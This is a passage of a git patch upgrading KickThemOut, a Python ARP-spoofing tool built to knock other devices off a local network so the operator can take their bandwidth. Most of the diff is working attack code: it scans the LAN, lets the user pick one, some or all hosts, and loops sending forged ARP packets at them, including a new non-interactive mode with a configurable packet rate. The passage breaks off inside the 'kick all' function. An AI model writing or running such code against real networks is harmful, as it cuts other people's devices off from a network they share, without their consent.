From 993ec221e3efba19261b6d0732c8bfc474e63e87 Mon Sep 17 00:00:00 2001 From: k4m4 Date: Mon, 5 Feb 2018 21:39:08 +0200 Subject: [PATCH] =?UTF-8?q?=F0=9F=8E=89=20v2.0=20release!!!?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitignore | 1 + .travis.yml | 9 +- CHANGES.rst | 4 - LICENSE | 2 +- README.rst | 109 ------ kickthemout.py | 999 ++++++++++++++++++++++++++++++----------------- readme.md | 142 +++++++ requirements.txt | 5 +- scan.py | 18 +- spoof.py | 13 +- 10 files changed, 815 insertions(+), 487 deletions(-) delete mode 100644 CHANGES.rst delete mode 100644 README.rst create mode 100644 readme.md diff --git a/.gitignore b/.gitignore index 92fd214..f469163 100644 --- a/.gitignore +++ b/.gitignore @@ -25,3 +25,4 @@ ENV/ *.tmp *.bak *.cfg +__pycache__/ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml index a304c84..c8a8e59 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,6 +1,9 @@ language: python python: - - "2.6" - - "2.7" + - "3.4" + - "3.5" + - "3.6" +install: + - pip3 install -r requirements.txt script: - - python -c "import kickthemout; import scan; import spoof" + - python -c "import kickthemout; import scan; import spoof" \ No newline at end of file diff --git a/CHANGES.rst b/CHANGES.rst deleted file mode 100644 index f4047ac..0000000 --- a/CHANGES.rst +++ /dev/null @@ -1,4 +0,0 @@ -0.1 (05.01.2017) ----------------- - -- Initial release. diff --git a/LICENSE b/LICENSE index 0996b5d..8118d78 100644 --- a/LICENSE +++ b/LICENSE @@ -1,6 +1,6 @@ MIT License -Copyright (c) 2017 Nikolaos Kamarinakis +Copyright (c) 2017-18 Nikolaos Kamarinakis Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal diff --git a/README.rst b/README.rst deleted file mode 100644 index 91bb31d..0000000 --- a/README.rst +++ /dev/null @@ -1,109 +0,0 @@ -.. image:: http://nikolaskama.me/content/images/2017/02/kickthemout_small.png - -KickThemOut -============ - -`KickThemOut `_ - **Kick Devices Off Your Network** - -A tool to kick devices out of your network and enjoy all the bandwidth for yourself. -It allows you to select specific or all devices and ARP spoofs them off your local area network. - -Compatible with Python 2.6 & 2.7. - -Authors: `Nikolaos Kamarinakis `_ & `David Schütz `_. - -.. image:: https://travis-ci.org/k4m4/kickthemout.svg?branch=master - :target: https://travis-ci.org/k4m4/kickthemout -.. image:: https://img.shields.io/badge/license-MIT-blue.svg - :target: https://github.com/k4m4/kickthemout/blob/master/LICENSE -.. image:: https://img.shields.io/badge/made%20with-%3C3-red.svg - :target: https://nikolaskama.me/kickthemoutproject -.. image:: https://img.shields.io/github/stars/k4m4/kickthemout.svg - :target: https://github.com/k4m4/kickthemout/stargazers - -------------- - -Debian Installation ----------------------- - -You can download KickThemOut by cloning the `Git Repo `_ and simply installing its requirements:: - - $ sudo apt-get update && sudo apt-get install nmap - - $ git clone https://github.com/k4m4/kickthemout.git - - $ cd kickthemout/ - - $ sudo -H pip install --upgrade pip - - $ sudo -H python -m pip install -r requirements.txt - - $ sudo python kickthemout.py - -MacOS Installation ----------------------- - -If you would like to install KickThemOut on a Mac, please run the following:: - - $ sudo -H pip install --upgrade pip - - $ sudo -H pip install pcapy - - $ brew update - - $ brew install --with-python libdnet nmap - -**Keep in mind** that you might be asked to run some commands after executing the previous step. Moving on:: - - $ git clone https://github.com/k4m4/kickthemout.git - - $ cd kickthemout/ - - $ sudo -H pip install -r requirements.txt - - $ sudo python kickthemout.py - -**NOTE**: You need to have `Homebrew `_ installed before running the Mac OS installation. - -Arch Installation ----------------------- - -You can download KickThemOut on an Arch based system by executing the following:: - - $ yaourt -S kickthemout-git - - $ sudo kickthemout - -Demo ------ - -Here's a short demo: - -.. image:: https://nikolaskama.me/content/images/2017/01/kickthemout_asciinema.png - :target: https://asciinema.org/a/98200?autoplay=1&loop=1 - -(For more demos click `here `_.) - -Developers ------------ - -* Nikolaos Kamarinakis - `@nikolaskama `_ -* David Schütz - `@xdavidhu `_ - -Disclaimer ------------ - -KickThemOut is provided as is under the MIT Licence (as stated below). -It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible. -In brief, do not use it with evil intent. - -License --------- - -Copyright (c) 2017 by `Nikolaos Kamarinakis `_ & `David Schütz `_. Some rights reserved. - -KickThemOut is under the terms of the `MIT License `_, following all clarifications stated in the `license file `_. - - -For more information head over to the `official project page `_. -You can also go ahead and email me anytime at **nikolaskam{at}gmail{dot}com** or David at **xdavid{at}protonmail{dot}com**. diff --git a/kickthemout.py b/kickthemout.py index c83748c..eccfc47 100644 --- a/kickthemout.py +++ b/kickthemout.py @@ -1,39 +1,43 @@ -#!/usr/bin/env python +#!/usr/bin/env python3 # -.- coding: utf-8 -.- # kickthemout.py -# authors: k4m4 & xdavidhu """ -Copyright (C) 2016 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) +Copyright (C) 2017-18 Nikolaos Kamarinakis (nikolaskam@gmail.com) & David Schütz (xdavid@protonmail.com) See License at nikolaskama.me (https://nikolaskama.me/kickthemoutproject) """ -import time, os, sys, logging, math +import os, sys, logging, math, traceback, optparse, threading from time import sleep -import urllib2 as urllib -import traceback BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m' -notRoot = False try: # check whether user is root if os.geteuid() != 0: - print("\n{0}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{1}$ sudo python kickthemout.py{2}\n").format(RED, GREEN, END) - notRoot = True + print("\n{}ERROR: KickThemOut must be run with root privileges. Try again with sudo:\n\t{}$ sudo python3 kickthemout.py{}\n".format(RED, GREEN, END)) + os._exit(1) except: # then user is probably on windows pass -if notRoot: - raise SystemExit + +def shutdown(): + print('\n\n{}Thanks for dropping by.' + '\nCatch ya later!{}'.format(GREEN, END)) + os._exit(1) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up scapy! try: + from scapy.config import conf + conf.ipv6_enabled = False from scapy.all import * - import scan, spoof + import scan, spoof, nmap + from urllib.request import urlopen, Request +except KeyboardInterrupt: + shutdown() except: - print("\n{0}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.").format(RED) - print("\n{0}If you still cannot resolve this error, please submit an issue here:\n\t{1}https://github.com/k4m4/kickthemout/issues\n{2}").format(RED, BLUE, END) - raise SystemExit + print("\n{}ERROR: Requirements have not been satisfied properly. Please look at the README file for configuration instructions.".format(RED)) + print("\n{}If you still cannot resolve this error, please submit an issue here:\n\t{}https://github.com/k4m4/kickthemout/issues\n\n{}Details: {}{}{}".format(RED, BLUE, RED, GREEN, str(sys.exc_info()[1]), END)) + os._exit(1) @@ -48,303 +52,86 @@ def heading(): █ ▐ ▀███▀ █ ▀ █ ▀███▀ █ █▄ ▄█ ▀ ▀ ▀ ▀ ▀ ▀▀▀ """ + END + BLUE + - '\n' + '{0}Kick Devices Off Your LAN ({1}KickThemOut{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + - '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format( - YELLOW, RED, YELLOW, BLUE).center(111) + - '\n' + 'Version: {0}0.1{1}\n'.format(YELLOW, END).center(86)) + '\n' + '{}Kick Devices Off Your LAN ({}KickThemOut{}){}'.format(YELLOW, RED, YELLOW, BLUE).center(98) + + '\n' + 'Made With <3 by: {0}Nikolaos Kamarinakis ({1}k4m4{2}) & {0}David Schütz ({1}xdavidhu{2}){3}'.format(YELLOW, RED, YELLOW, BLUE).center(111) + + '\n' + 'Version: {}2.0{} \n'.format(YELLOW, END).center(86)) + + + +# loading animation during network scan +def scanningAnimation(text): + try: + global stopAnimation + i = 0 + while stopAnimation is not True: + tempText = list(text) + if i >= len(tempText): + i = 0 + tempText[i] = tempText[i].upper() + tempText = ''.join(tempText) + sys.stdout.write(GREEN + tempText + '\r' + END) + sys.stdout.flush() + i += 1 + time.sleep(0.1) + except: + os._exit(1) # display options def optionBanner(): - print('\nChoose option from menu:\n') + print('\nChoose an option from the menu:\n') sleep(0.2) - print('\t{0}[{1}1{2}]{3} Kick ONE Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}1{}]{} Kick ONE Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\t{0}[{1}2{2}]{3} Kick SOME Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}2{}]{} Kick SOME Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\t{0}[{1}3{2}]{3} Kick ALL Off').format(YELLOW, RED, YELLOW, WHITE) + print('\t{}[{}3{}]{} Kick ALL Off'.format(YELLOW, RED, YELLOW, WHITE)) sleep(0.2) - print('\n\t{0}[{1}E{2}]{3} Exit KickThemOut\n').format(YELLOW, RED, YELLOW, WHITE) + print('\n\t{}[{}E{}]{} Exit KickThemOut\n'.format(YELLOW, RED, YELLOW, WHITE)) # initiate debugging process def runDebug(): - print("\n\n{0}WARNING! An unknown error has occurred, starting debug...{1}").format(RED, END) + print("\n\n{}WARNING! An unknown error has occurred, starting debug...{}".format(RED, END)) print( - "{0}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){1}").format( - RED, END) - print("{0}").format(RED) + "{}Starting debug... (Please report this crash on 'https://github.com/k4m4/kickthemout/issues' with your private information removed where necessary){}".format( + RED, END)) try: print("Current defaultGatewayMac: " + defaultGatewayMac) except: print("Failed to print defaultGatewayMac...") try: - print("Reloading mac getter function...") + print("Reloading MAC retriever function...") regenOnlineIPs() print("Reloaded defaultGatewayMac: " + defaultGatewayMac) except: - print("Failed to reload mac getter function / to print defaultGatewayMac...") + print("Failed to reload MAC retriever function / to print defaultGatewayMac...") try: print("Known gateway IP: " + defaultGatewayIP) except: print("Failed to print defaultGatewayIP...") - try: - print("Current hostslist array: ") - print(hostsList) - except: - print("Failed to print hostsList array...") try: print("Crash trace: ") print(traceback.format_exc()) except: print("Failed to print crash trace...") print("DEBUG FINISHED.\nShutting down...") - print("{0}").format(END) - raise SystemExit + print("{}".format(END)) + os._exit(1) -# regenerate online IPs array & configure gateway -def regenOnlineIPs(): - global onlineIPs - global defaultGatewayMac - global defaultGatewayMacSet - - if not defaultGatewayMacSet: - defaultGatewayMac = "" - - onlineIPs = [] - for host in hostsList: - onlineIPs.append(host[0]) - if not defaultGatewayMacSet: - if host[0] == defaultGatewayIP: - defaultGatewayMac = host[1] - - if not defaultGatewayMacSet and defaultGatewayMac == "": - # request gateway MAC address (after failed detection by scapy) - print("\n{0}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) - header = ("{0}kickthemout{1}> {2}Enter your gateway's MAC Address {3}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) - defaultGatewayMac = raw_input(header) - defaultGatewayMacSet = True - - - -# scan network -def scanNetwork(): - global hostsList +# make sure there is an internet connection +def checkInternetConnection(): try: - # call scanning function from scan.py - hostsList = scan.scanNetwork(getDefaultInterface(True)) + urlopen('https://google.com', timeout=3) + return True + except urllib.URLError as err: + return False except KeyboardInterrupt: - print('\n\n{0}Thanks for dropping by.\nCatch ya later!{1}').format(GREEN, END) - raise SystemExit - except: - print("\n{0}ERROR: Network scanning failed. Please check your requirements configuration.{1}\n").format(RED, END) - raise SystemExit - regenOnlineIPs() - -def get_hostname(ip): - try: - hostname = utils.socket.gethostbyaddr(ip)[0] - except: - pass - if ip == utils.socket.getfqdn(ip): - hostname = 'N/A' - return hostname - - - -# kick one device -def kickoneoff(): - os.system("clear||cls") - print("\n{0}kickONEOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + mac + "{4}\t" + vendor + "(" + hostname + ")" + "{5}").format(YELLOW, WHITE, RED, BLUE, GREEN, END) - - canBreak = False - while not canBreak: - try: - choice = int(raw_input("\nChoose a target: ")) - one_target_ip = onlineIPs[choice] - canBreak = True - except KeyboardInterrupt: - return - except: - print("\n{0}ERROR: Please enter a number from the list!{1}").format(RED, END) - - # locate MAC of specified device - one_target_mac = "" - for host in hostsList: - if host[0] == one_target_ip: - one_target_mac = host[1] - if one_target_mac == "": - print("\nIP address is not up. Please try again.") - return - - print("\n{0}Target: {1}" + one_target_ip).format(GREEN, END) - - print("\n{0}Spoofing started... {1}").format(GREEN, END) - try: - while True: - # broadcast malicious ARP packets (10p/s) - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, one_target_ip, one_target_mac) - time.sleep(10) - except KeyboardInterrupt: - # re-arp target on KeyboardInterrupt exception - print("\n{0}Re-arping{1} target...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - try: - # broadcast ARP packets with legitimate info to restore connection - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} target successfully.{2}").format(RED, GREEN, END) - - - -# kick multiple devices -def kicksomeoff(): - os.system("clear||cls") - print("\n{0}kickSOMEOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(" [{0}" + str(i) + "{1}] {2}" + str(onlineIPs[i]) + "{3}\t" + vendor + "(" + hostname + ")" + "{4}" ).format(YELLOW, WHITE, RED, GREEN, END) - - canBreak = False - while not canBreak: - try: - choice = raw_input("\nChoose devices to target(comma-separated): ") - if ',' in choice: - some_targets = choice.split(",") - canBreak = True - else: - print("\n{0}ERROR: Please select more than 1 devices from the list.{1}\n").format(RED, END) - except KeyboardInterrupt: - return - - some_ipList = "" - for i in some_targets: - try: - some_ipList += GREEN + "'" + RED + onlineIPs[int(i)] + GREEN + "', " - except KeyboardInterrupt: - return - except: - print("\n{0}ERROR: '{1}" + i + "{2}' is not in the list.{3}\n").format(RED, GREEN, RED, END) - return - some_ipList = some_ipList[:-2] + END - - print("\n{0}Targets: {1}" + some_ipList).format(GREEN, END) - - print("\n{0}Spoofing started... {1}").format(GREEN, END) - try: - while True: - # broadcast malicious ARP packets (10p/s) - for i in some_targets: - ip = onlineIPs[int(i)] - for host in hostsList: - if host[0] == ip: - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) - time.sleep(10) - except KeyboardInterrupt: - # re-arp targets on KeyboardInterrupt exception - print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - # broadcast ARP packets with legitimate info to restore connection - for i in some_targets: - ip = onlineIPs[int(i)] - for host in hostsList: - if host[0] == ip: - try: - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) - - - -# kick all devices -def kickalloff(): - os.system("clear||cls") - print("\n{0}kickALLOff{1} selected...{2}\n").format(RED, GREEN, END) - sys.stdout.write("{0}Hang on...{1}\r".format(GREEN, END)) - sys.stdout.flush() - scanNetwork() - - print("Online IPs: ") - for i in range(len(onlineIPs)): - mac = "" - for host in hostsList: - if host[0] == onlineIPs[i]: - mac = host[1] - vendor = resolveMac(mac) - hostname = get_hostname(onlineIPs[i]) - print(str(" {0}"+ str(onlineIPs[i]) + "{1}\t" + vendor + "(" + hostname + ")" + "{2}").format(RED, GREEN, END)) - - print("\n{0}Spoofing started... {1}").format(GREEN, END) - try: - # broadcast malicious ARP packets (10p/s) - reScan = 0 - while True: - for host in hostsList: - if host[0] != defaultGatewayIP: - # dodge gateway (avoid crashing network itself) - spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) - reScan += 1 - if reScan == 4: - reScan = 0 - scanNetwork() - time.sleep(10) - except KeyboardInterrupt: - print("\n{0}Re-arping{1} targets...{2}").format(RED, GREEN, END) - reArp = 1 - while reArp != 10: - # broadcast ARP packets with legitimate info to restore connection - for host in hostsList: - if host[0] != defaultGatewayIP: - try: - # dodge gateway - spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) - except KeyboardInterrupt: - pass - except: - runDebug() - reArp += 1 - time.sleep(0.5) - print("{0}Re-arped{1} targets successfully.{2}").format(RED, GREEN, END) + shutdown() @@ -373,124 +160,624 @@ def getDefaultInterface(returnNet=False): -# retrieve gateway IP -def getGatewayIP(): - try: - getGateway_p = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) - return getGateway_p.src - except: - # request gateway IP address (after failed detection by scapy) - print("\n{0}ERROR: Gateway IP could not be obtained. Please enter IP manually.{1}\n").format(RED, END) - header = ('{0}kickthemout{1}> {2}Enter Gateway IP {3}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) - gatewayIP = raw_input(header) - return gatewayIP - - - # retrieve default interface MAC address def getDefaultInterfaceMAC(): try: defaultInterfaceMac = get_if_hwaddr(defaultInterface) if defaultInterfaceMac == "" or not defaultInterfaceMac: print( - "\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format( - RED, END) - header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) - defaultInterfaceMac = raw_input(header) - return defaultInterfaceMac + "\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format( + RED, END)) + header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) + return (input(header)) else: return defaultInterfaceMac except: # request interface MAC address (after failed detection by scapy) - print("\n{0}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{1}\n").format(RED, END) - header = ('{0}kickthemout{1}> {2}Enter MAC Address {3}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) - defaultInterfaceMac = raw_input(header) - return defaultInterfaceMac + print("\n{}ERROR: Default Interface MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END)) + header = ('{}kickthemout{}> {}Enter MAC Address {}(MM:MM:MM:SS:SS:SS): '.format(BLUE, WHITE, RED, END)) + return (input(header)) + + + +# retrieve gateway IP +def getGatewayIP(): + global stopAnimation + try: + getGateway = sr1(IP(dst="google.com", ttl=0) / ICMP() / "XXXXXXXXXXX", verbose=False) + return getGateway.src + except: + # request gateway IP address (after failed detection by scapy) + stopAnimation = True + print("\n{}ERROR: Gateway IP could not be obtained. Please enter IP manually.{}\n".format(RED, END)) + header = ('{}kickthemout{}> {}Enter Gateway IP {}(e.g. 192.168.1.1): '.format(BLUE, WHITE, RED, END)) + return (input(header)) + + + +# retrieve host MAC address +def retrieveMACAddress(host): + try: + query = Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=host) + ans, _ = srp(query, timeout=2, verbose=0) + for _, rcv in ans: + return rcv[Ether].src + break + except: + return False # resolve mac address of each vendor def resolveMac(mac): try: - # sen request to macvendors.co - url = "https://macvendors.co/api/vendorname/" - request = urllib.Request(url + mac, headers={'User-Agent': "API Browser"}) - response = urllib.urlopen(request) + # send request to macvendors.co + url = "http://macvendors.co/api/vendorname/" + request = Request(url + mac, headers={'User-Agent': "API Browser"}) + response = urlopen(request) vendor = response.read() vendor = vendor.decode("utf-8") vendor = vendor[:25] return vendor + except KeyboardInterrupt: + shutdown() except: return "N/A" +# regenerate online IPs array & configure gateway +def regenOnlineIPs(): + global onlineIPs, defaultGatewayMac, defaultGatewayMacSet + + if not defaultGatewayMacSet: + defaultGatewayMac = "" + + onlineIPs = [] + for host in hostsList: + onlineIPs.append(host[0]) + if not defaultGatewayMacSet: + if host[0] == defaultGatewayIP: + defaultGatewayMac = host[1] + + if not defaultGatewayMacSet and defaultGatewayMac == "": + # request gateway MAC address (after failed detection by scapy) + print("\n{}ERROR: Default Gateway MAC Address could not be obtained. Please enter MAC manually.{}\n".format(RED, END)) + header = ("{}kickthemout{}> {}Enter your gateway's MAC Address {}(MM:MM:MM:SS:SS:SS): ".format(BLUE, WHITE, RED, END)) + defaultGatewayMac = input(header) + defaultGatewayMacSet = True + + + +# scan network +def scanNetwork(): + global hostsList + try: + # call scanning function from scan.py + hostsList = scan.scanNetwork(getDefaultInterface(True)) + except KeyboardInterrupt: + pass + except: + print("\n\n{}ERROR: Network scanning failed. Please check your requirements configuration.{}".format(RED, END)) + os._exit(1) + regenOnlineIPs() + + + +# non-interactive attack +def nonInteractiveAttack(): + + print("\n{}nonInteractiveAttack{} activated...{}\n".format(RED, GREEN, END)) + + target = options.targets + print("\n{}Target(s): {}{}".format(GREEN, END, ", ".join(target))) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Checking target status...',)) + t.daemon = True + t.start() + + try: + nm = nmap.PortScanner() + counter = 0 + for host in target: + a = nm.scan(hosts=host, arguments='-sn') + if a['scan'] != {}: + for k, v in a['scan'].items(): + if str(v['status']['state']) == 'up': + pass + else: + if len(target) == 1 or counter == len(target)-1: + stopAnimation = True + sys.stdout.write("\033[K") + print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END)) + os._exit(1) + else: + sys.stdout.write("\033[K") + print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END)) + target.remove(host) + counter += 1 + pass + else: + if len(target) == 1 or counter == len(target)-1: + stopAnimation = True + sys.stdout.write("\033[K") + print("\n{}ERROR: Target {}{}{} doesn't seem to be alive. Exiting...{}".format(RED, END, str(host), RED, END)) + os._exit(1) + else: + sys.stdout.write("\033[K") + print("\n{}WARNING: Target {}{}{} doesn't seem be alive. Skipping...{}".format(RED, END, str(host), RED, END)) + target.remove(host) + counter += 1 + pass + + stopAnimation = True + sys.stdout.write("\033[K") + + defaultGatewayIP = getGatewayIP() + defaultGatewayMac = retrieveMACAddress(defaultGatewayIP) + + except KeyboardInterrupt: + shutdown() + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + for i in target: + ipAddress = i + macAddress = retrieveMACAddress(ipAddress) + if macAddress == False: + print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END)) + os._exit(1) + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, ipAddress, macAddress) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp targets on KeyboardInterrupt exception + print("\n{}Re-arping{} target(s)...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for i in target: + ipAddress = i + try: + macAddress = retrieveMACAddress(ipAddress) + except: + print("\n{}ERROR: MAC address of target host could not be retrieved! Maybe host is down?{}".format(RED, END)) + os._exit(1) + try: + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, ipAddress, macAddress) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} target(s) successfully.{}".format(RED, GREEN, END)) + + + +# kick one device +def kickoneoff(): + os.system("clear||cls") + + print("\n{}kickONEOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Online IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + canBreak = False + while not canBreak: + try: + choice = int(input("\nChoose a target: ")) + oneTargetIP = onlineIPs[choice] + canBreak = True + except KeyboardInterrupt: + shutdown() + except: + print("\n{}ERROR: Please enter a number from the list!{}".format(RED, END)) + + # locate MAC of specified device + oneTargetMAC = "" + for host in hostsList: + if host[0] == oneTargetIP: + oneTargetMAC = host[1] + if oneTargetMAC == "": + print("\nIP address is not up. Please try again.") + return + + print("\n{}Target: {}{}".format(GREEN, END, oneTargetIP)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, oneTargetIP, oneTargetMAC) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp target on KeyboardInterrupt exception + print("\n{}Re-arping{} target...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + try: + # broadcast ARP packets with legitimate info to restore connection + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} target successfully.{}".format(RED, GREEN, END)) + + + +# kick multiple devices +def kicksomeoff(): + os.system("clear||cls") + + print("\n{}kickSOMEOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Online IPs: ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + canBreak = False + while not canBreak: + try: + choice = input("\nChoose devices to target (comma-separated): ") + if ',' in choice: + someTargets = choice.split(",") + canBreak = True + else: + print("\n{}ERROR: Please select more than 1 devices from the list.{}\n".format(RED, END)) + except KeyboardInterrupt: + shutdown() + + someIPList = "" + for i in someTargets: + try: + someIPList += onlineIPs[int(i)] + ", " + except KeyboardInterrupt: + shutdown() + except: + print("\n{}ERROR: '{}{}{}' is not in the list.{}\n".format(RED, GREEN, i, RED, END)) + return + someIPList = someIPList[:-2] + END + + print("\n{}Targets: {}{}".format(GREEN, END, someIPList)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + while True: + # broadcast malicious ARP packets + for i in someTargets: + ip = onlineIPs[int(i)] + for host in hostsList: + if host[0] == ip: + spoof.sendPacket(defaultInterfaceMac, defaultGatewayIP, host[0], host[1]) + if options.packets is not None: + time.sleep(60/float(options.packets)) + else: + time.sleep(10) + except KeyboardInterrupt: + # re-arp targets on KeyboardInterrupt exception + print("\n{}Re-arping{} targets...{}".format(RED, GREEN, END)) + reArp = 1 + while reArp != 10: + # broadcast ARP packets with legitimate info to restore connection + for i in someTargets: + ip = onlineIPs[int(i)] + for host in hostsList: + if host[0] == ip: + try: + spoof.sendPacket(defaultGatewayMac, defaultGatewayIP, host[0], host[1]) + except KeyboardInterrupt: + pass + except: + runDebug() + reArp += 1 + time.sleep(0.2) + print("{}Re-arped{} targets successfully.{}".format(RED, GREEN, END)) + + + +# kick all devices +def kickalloff(): + os.system("clear||cls") + + print("\n{}kickALLOff{} selected...{}\n".format(RED, GREEN, END)) + global stopAnimation + stopAnimation = False + t = threading.Thread(target=scanningAnimation, args=('Hang on...',)) + t.daemon = True + t.start() + + # commence scanning process + try: + scanNetwork() + except KeyboardInterrupt: + shutdown() + stopAnimation = True + + print("Target(s): ") + for i in range(len(onlineIPs)): + mac = "" + for host in hostsList: + if host[0] == onlineIPs[i]: + mac = host[1] + try: + hostname = utils.socket.gethostbyaddr(onlineIPs[i])[0] + except: + hostname = "N/A" + vendor = resolveMac(mac) + print(" [{}{}{}] {}{}{}\t{}{}\t{} ({}{}{}){}".format(YELLOW, str(i), WHITE, RED, str(onlineIPs[i]), BLUE, mac, GREEN, vendor, YELLOW, hostname, GREEN, END)) + + if options.packets is not None: + print("\n{}Spoofing started... {}( {} pkts/min )".format(GREEN, END, str(options.packets))) + else: + print("\n{}Spoofing started... {}".format(GREEN, END)) + try: + # broadcast malicious ARP packets + reScan = 0 + while True: + for host in hostsList: + if host[0] != defaultGatewayIP: + # dodge gateway (avoid crashing network 